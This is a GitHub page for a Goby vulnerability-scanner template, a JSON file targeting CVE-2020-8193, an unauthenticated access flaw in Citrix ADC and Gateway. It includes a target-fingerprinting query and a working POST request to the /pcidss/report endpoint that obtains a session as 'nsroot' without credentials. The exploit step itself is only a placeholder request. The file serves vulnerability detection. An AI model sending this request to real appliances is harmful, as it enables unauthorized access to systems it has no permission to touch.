forked from zan8in/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Citrix_unauthenticated_LFI_CVE-2020-8193.json
executable file
·107 lines (107 loc) · 4.34 KB
/
Citrix_unauthenticated_LFI_CVE-2020-8193.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
{
"Name": "Citrix unauthenticated LFI CVE-2020-8193",
"Level": "1",
"Tags": [
"Unauthorized"
],
"GobyQuery": "app=\"citrix-公司产品\" || title=\"Citrix Login\" || body=\"Citrix ADC\"",
"Description": "Citrix is committed to our strong cybersecurity posture to protect our customers, partners, and employees.",
"Product": "citrix",
"Homepage": "https://www.citrix.com/",
"Author": "",
"Impact": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints",
"Recommendation": "https://support.citrix.com/article/CTX276688",
"References": [
"https://github.com/jas502n/CVE-2020-8193",
"http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1",
"follow_redirect": false,
"header": {
"Content-Type": "application/xml",
"X-NITRO-PASS": "{{{str1}}}",
"X-NITRO-USER": "{{{str2}}}"
},
"data_type": "text",
"data": "<appfwprofile><login></login></appfwprofile>",
"set_variable": [
"str2|rand|str|8",
"str1|rand|str|8"
]
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "406",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "SESSID=",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}